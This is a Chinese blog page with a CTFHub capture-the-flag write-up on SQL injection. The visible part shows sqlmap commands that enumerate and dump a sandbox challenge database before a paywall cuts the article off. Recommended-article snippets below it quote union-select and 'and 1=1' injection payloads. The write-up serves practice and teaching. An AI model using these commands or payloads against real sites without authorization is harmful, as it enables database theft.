CTFHub~SQL注入【MySQL结构+Cookie注入+UA注入+Refer注入+过滤空格】

蚂蚱.top

已于 2024-08-21 14:57:56 修改

阅读量689

点赞数 12

分类专栏： CTFHub靶场文章标签：网络安全 php apache android sql

于 2024-08-19 18:59:51 首次发布

本文链接：https://blog.youkuaiyun.com/weixin_67832625/article/details/141332588

版权

在这里插入图片描述

0x05时间盲注

我们还是继续来用sqlmap来爆数据库。

# 查询数据库名
python3 sqlmap.py sqlmap -u "http://challenge-5f63f4fbdb956b3d.sandbox.ctfhub.com:10800?id=1" --current-db --batch

# 查看数据库的表名
python3 sqlmap.py sqlmap -u "http://challenge-5f63f4fbdb956b3d.sandbox.ctfhub.com:10800?id=1" -D sqli --tables --batch

# 查看数据库中flag表中的字段
python3 sqlmap.py sqlmap -u "http://challenge-5f63f4fbdb956b3d.sandbox.ctfhub.com:10800?id=1" -D sqli -T flag --columns --batch

# 查看当前数据库中的所有数据
python3 sqlmap.py sqlmap -u "http://challenge-5f63f4fbdb956b3d.sandbox.ctfhub.com:10800?id=1" -D sqli -T flag --dump --batch

0x06MySQL结构

# 查询数据库名
python3 sqlmap.py sqlmap -u "http://challenge-d7a3

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

蚂蚱.top

关注关注

12
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CTFHub SQL注入

万丈⾼楼平地起，勿在浮沙筑⾼台学艺不精的安全菜鸡，改行回家养猪了，对博客有疑问欢迎留言，看到一定回

02-09

1223

ctfhub的SQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句，根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数首先使用order by 3 ，页面无回显，改为2之后页面显示正确。因此判断当前数据库当前表，共有2个字段。 3、使用联合查询，判断页面显示位首先将id改为一个不存在的纸，根据联合查询的特性，就会返回11111，222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数

CTFHUB-web-SQL注入

ookami6497的博客

11-29

1004

CTFHUB SQL

参与评论您还未登录，请先登录后发表或查看评论

【CTFHub】SQL注入cookie注入及知识点

最新发布

2401_86760082的博客

01-18

456

打开题目页面如下根据提示应该在cookie处注入，通过burpsuite抓包并发到重放器。

CTFHub~SQL注入超简单详细教程

weixin_67832625的博客

08-14

2350

本文主要是对CTFHub靶场的SQL注入做了详细的教程讲解，让练习者对SQL注入有更详细的了解和深入，如有什么问题，随时联系作者

CTFHub-sql注入

qq_60905276的博客

01-30

5877

1.整数型注入先判断有没有注入点 ?id=1 and 1=1 ?id=1 and 1=2 证明有注入点在输入1看看。有回显。

CTFHub---SQL注入

weixin_53736204的博客

07-28

795

1.输入1发现有两个回显，那么直接查库2.查表3.查flag表的字段名4.查表数据。

ctfhub SQL注入

mrwangtw的博客

09-03

358

整数型注入（1）判断是否存在注入 1）加单引号 2）加and 1=1 3）加and 1=2 （2）查询字段 id=1 order by 2如果返回和id=1一样的结果，则order by 3，如果返回值与id=1时不同，那么字段就是2个（3）查询SQL语句插入位置 ?id=-1 union select 1,2；查看结果（4）获取数据库名获取当前数据库 ?id=-1 union select 1,database() 获取所有数据库 ?id=-1 union se.

CTFHub——SQL注入

Aquarius_ego的博客

05-05

1854

CTFHub——SQL注入（报错注入、布尔盲注、时间盲注、MySQL结构、Cookie注入、UA注入、Refer注入、过滤空格）

CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记

qq_45716477的博客

04-19

656

目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题，有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能，丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入输入1 and 1=1 和1 and 1=2 输

CTFHub(SQL注入)

cxiaodi的博客

05-09

1382

CTFHub（SQL注入专题）

ctf小经验sql注入

04-11

sql注入一、找到注入点；二、判断当前表的字段；三、用联合语句查看哪几位是有效位；四、查看当前数据库中有哪些表；五、查看表中有哪些属性；

CTFHUB-SQL注入

2402_87387389的博客

01-16

824

CTFHUB-SQL注入

ctfhub_sql注入

lyy0xfff的博客

07-27

346

CTFHub-SQL注入文章目录CTFHub-SQL注入整数型注入字符型注入报错注入布尔盲注时间盲注MySQL结构Cookie注入过滤空格UA注入Refer注入整数型注入由题意输入1，可以看到回显位置有两个，所以猜解有两列。 1 order by 3 1 order by 2 可以得知为2列，开始爆破数据数据库、用户名表名 -1 union select 1,(select group_concat(table_name) from information_schema.tables wh

CTFHub（web SQL注入）

2301_81105268的博客

04-18

1428

id=1这个语句在数据库中返回几列，也就是SELECT * FROM uers WHERE id=1 and 1=2 LIMIT 1,0这个语句的数据结果集有几列，然后才可以用union进行联合查询。(2)可以用concat()或concat_ws()或group_concat()—[见数据库连接语句]----使得在sql注入时快速获得数据库的相关信息。使用order by语句进行测试：1 order by 1、1 order by 2等，直到报错为止，报错的前一个数，为字段数。

CTF-Web学习笔记——简单SQL注入（一）

weixin_55914379的博客

01-07

576

SQL注入之简单手注

CTFHUB之sql注入（特详解）

小宇的web博客

06-16

3102

CTFHUB之sql注入 1.整数型注入 1.这里我使用的是Hackbar来进行sql注入，首先先判断有没有注入漏洞加单引号去掉‘加上and 1=1发现出现了回显将1=1变为1=2，语句正确但是无法访问数据库这里可以判定这里存在数字注入漏洞 2.接下来判断字段数量这里输入id=1 order by 2看是否字段数量是否是2个 3.查询SQL语句插入位置这里使用联合查询，查询库名。可以在data库中插入sql语句，也就是2的位置 4.获取数据库库名 1）获取当前数据库库名，数据库的名称为

CTF—SQL注入（get）

YkingH的博客

07-09

942

CTF—WEB—SQL注入 SQL注入漏洞介绍 sql注入攻击指的是构建特殊的输入作为参数传入Web应用程序，而这些输入大都是sql语法里的一些组合，通过执行sql语句而执行攻击者所要的操作，其主要原因是程序没有细致的过滤用户输入的数据，致使非法数据侵入系统。 sql注入产生的原因，通常表现在：不当的类型处理不安全的数据库配置不合理的查询集处理不当的错误处理转义字符处理不合适多个提交处理不当信息探测扫描主机服务信息及服务版本 nmap -sV 靶机ip地址快速扫描主机全部信息 nmap

CTFhub之SQL注入

qq_64703089的博客

08-12

676

适合新手练习。

clj-di: Clojure与ClojureScript依赖注入工具

资源摘要信息:"clj-di:用于测试 Clojure 和 ClojureScript 的依赖注入和实用程序带" Clojure 是一种现代、通用、具有函数式编程特性的Lisp语言，运行在Java虚拟机上。ClojureScript是Clojure语言的一个变种，专为...